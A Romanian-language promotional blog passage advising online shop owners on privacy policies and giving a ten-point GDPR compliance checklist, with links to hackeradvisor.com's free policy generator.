De asemenea, avantaje importante există și pentru firmele care comercializează diferite categorii de produse. Practic, produsele pe care le dețin pot fi cumpărate de orice persoană de pe teritoriul țării, nu numai de cele din localitatea proprie unde există magazinul sau magazinele clasice!

Așadar, dacă sunteți interesat de mediul online și, mai ales, dacă doriți să vă deschideți un magazin online, implicit va trebui să interacționați cu foarte multe persoane fizice și juridice și să prelucrați date importante cu caracter personal.

Datorită acestui lucru este necesar să respectați anumite reguli care vizează în primul rând securitatea datelor personale prelucrate de firma dumneavoastră în ceea ce privește clienții magazinului.

 

De ce aveți nevoie de o bună Politică de confidențialitate a datelor?

            Există reglementări legale în vigoare potrivit cărora, persoanele juridice sau fizice care colectează date cu caracter personal sunt obligate să le asigure securitatea lor. De asemenea, există și o autoritate centrală de stat, Agenția Națională de Supraveghere a Prelucrării Datelor cu Caracter Personal, care are drept scop organizarea, monitorizarea și controlul modului în care sunt utilizate și securizate datele cu caracter personal prelucrate de operatorii online și offline.

Mai mult ca sigur că ați aflat deja că amenzile pentru neregulile descoperite în acest domeniu sunt destul de mari și pot varia între 1500 și 5000 de lei!!

Așadar, pentru a respecta prevederile legale și pentru a evita sancțiuni mari, este recomandat ca toate obligațiile prevăzute în legile aflate în vigoare să fie ….îndeplinite…cu strictețe.

De asemenea, este recomandat să vă luați și dumneavoastră măsurile necesare de precauție deoarece incidente neplăcute pot apare oricând. O foarte bună Politică de confidențialitate vă pune la adăpost oricând de persoanele rău intenționate sau de către persoanele care profită de cele mai multe ori de anumite lipsuri pe care acestea le descoperă întâmplător sau …. chiar intenționat.

 

Ce tip de informații sunt furnizate, de obicei, despre confidențialitatea datelor?

            Potrivit procedurilor existente, atunci când prelucrați date cu caracter personal, este recomandat să informați utilizatorii site-ului despre tipul de date pe care îl colectați. De asemenea, va trebui să precizați scopul pentru care colectați aceste date, cum și când vor fi folosite (Exemplu: când se procesează o livrare, când se întocmește factura, pentru activități de promovare și marketing, etc.).

De asemenea, legea ne obligă ca, în acest caz, să specificăm felul în care protejăm datele de colectare, stocarea precum și gestionarea acestora. Este recomandat să precizăm și ce tehnologii folosim precum și eficiența lor, implicit.

Un alt lucru important în ceea ce privește procedura de confidențialitate este specificarea următorului lucru: dacă datele vor fi sau nu transmise către terți!

În concluzie, dacă sunteți în situația de a a avea nevoie de o bună Politică de confidențialitate pentru activitatea site-ului dumneavoastră și dacă aveți nevoie de ajutor, vă recomandăm să studiați oferta site-ului hackeradvisor.com! Această firma vă oferă un generator de politica de confidentialitate care este complet GRATUIT!

SUCCES și ….afaceri cât mai profitabile!

Categorii
gdpr

Ai un magazin online și nu știi dacă ai înțeles bine ce trebuie din GDPR ?

Uite 10 pași să verifici. Hai să vedem ce implicații are GDPR pentru un magazin online sau o firmă mică sau mijlocie.

  1. Dacă prelucrează date personale pe scară largă, așa cum face un magazin online firma va trebui să aibă un registru al operațiunilor de prelucrare adică un document unde să scrie ce date prelucrează, spre exemplu: e-mail, telefon, adresă, cnp, în ce scop: marketing, derulare contract, etc., în baza cărui temei legal din cele 6 definite, si pentru ce perioadă, dacă le prelucrează direct sau prin intermediar și ce măsuri de securitate s-au luat pentru protectia datelor.
  2. Deși toți ne gândim la CNP, adresă, serie card credit, telefon și e-mail ca fiind date personale conform GDPR orice informație care poate identifica o persoană fizică este o dată personală. Adică inclusiv ziua de naștere, date de localizare, sau de acces cum ar fi ai PIN-ul, sau date cu care se intră în site.

O poză cu o persoană, postările de pe rețelele sociale și orice alt identificator online, cum ar fi unul din baza de date, care să identifice persoana pe viitor sau chiar și informații mai generice dacă este bărbat sau femeie, ce etnie sau ce culoare are.

  1. Dacă prelucrezi date personale pe scară largă așa cum face un magazin online, trebuie să ai asigurat un Data Protection officer (DPO). Acesta nu poate fi concediat sau sancționat pentru activitatea lui. Mai mult el trebuie să aibă acces la toate acele date personale să aibă acces la conducerea instituției și nu poate fi în conflict de interese, adică nu poate să fie și responsabil de marketing în același timp și să prelucreze datele.
  2. O atenție deosebită trebuie dată faptului că toți angajații din firmă trebuie învățați să recunoască cererile persoanelor fizice vizavi de drepturile lor. Uzual, acestea sunt: interogarea, ștergerea sau modificarea datelor personale, și în mod ideal ar trebui să le trimită persoanei abilitate, nu să dea un răspuns direct dacă nu au fost instruiți în acest scop. De știut este că în maxim 30 de zile trebuie să se dea un răspuns cererii, iar această cerere poate fi o amânare de încă maxim 60 de zile deci până una alta ai un răgaz de maxim trei luni să răspunzi la orice cerere.
  3. Dacă tu lucrezi cu o agenție de marketing care are acces la datele personale culese de tine atunci acea agenție se cheamă împuternicit și tu te numești operator și din punct de vedere legal tu operatorul răspunzi pentru tot inclusiv pentru instructajul dat împuternicitul lui. Ce date are voie să prelucreze în acest scop și pentru cât timp. Deci trebuie să existe o anexă la contract care să specifice aceste lucruri.
  4. A treia entitate din GDPR este autoritatea de supraveghere și apropo de asta, ar trebui să știi că GDPR este un regulament european nu o directivă.

Adică intră în vigoare direct fără nicio altă formalitate în toate statele Uniunii Europene fără să aibă nevoie de o lege națională. Mai mult și până acum existau legi naționale de protecție a datelor, ce se schimbă însă de acum încolo este că persoanele fizice afectate pot da în judecată direct operatorii nu doar să-i reclame la Autoritatea de Supraveghere așa cum era până acum.

  1. Persoanele fizice au o suită de drepturi. Unul din cele mai importante fiind cel de opoziție. Adică dacă nu vrea să îi prelucrezi datele personale nu ai voie să îl dai afară din magazin, dacă cumpără.

îi poți cere strict datele necesare efectuării contractului, fără alt consimțământ pentru Google Analytics Google marketing sau de Facebook pixel.

  1. Orice pierdere a datelor, de exemplu, un hard disk scăpat pe jos un laptop furat sau un site spart trebuie raportat la autoritate în maxim 72 de ore ca incident de securitate și trebuie făcută o analiză scrisă cu ce măsuri se iau pentru prevenirea pe venit în viitor.
  2. Apropo de incidente. Una din cele mai importante informații din Registrul operațiunilor de prelucrare este cea cu metodele de securitate luate pentru protecția datelor adică.

Ce face firma pentru a proteja datele, dacă le cripteaza sau nu, dacă le stochează în siguranță unde le face backup și destul de important dacă are un audit de securitate pentru site.

  1. Te vei întreba dacă să dai sau nu e-mail de confirmare abonaților existenți la newsletter. Răspunsul este oarecum simplu: dacă ai obținut deja consimțământul pentru abonare nu trebuie să mai faci încă o dată acest lucru. Dacă îl poți proba dacă nu l ai obținut atunci în principiu nu ai prea avea voie să îl cer pentru că teoretic tu nu ai adresa respectivului de e-mail.

Dacă insa il ai, dar nu îl pot proba, sau dacă cumva acea persoană a cumpărat deja din magazin dar nu și-a dat consimțământul explicit până acum ca ar vrea să-i trimiți de acum încolo newsletter, atunci ai putea să îl ceri ca să îl pot proba pentru viitor.

Acestea au fost minimul de informații pe care trebuie să le știi pentru a-ti alinia site-ul sau magazinul online la cerintele GDPR.

sursa: www.hackeradvisor.com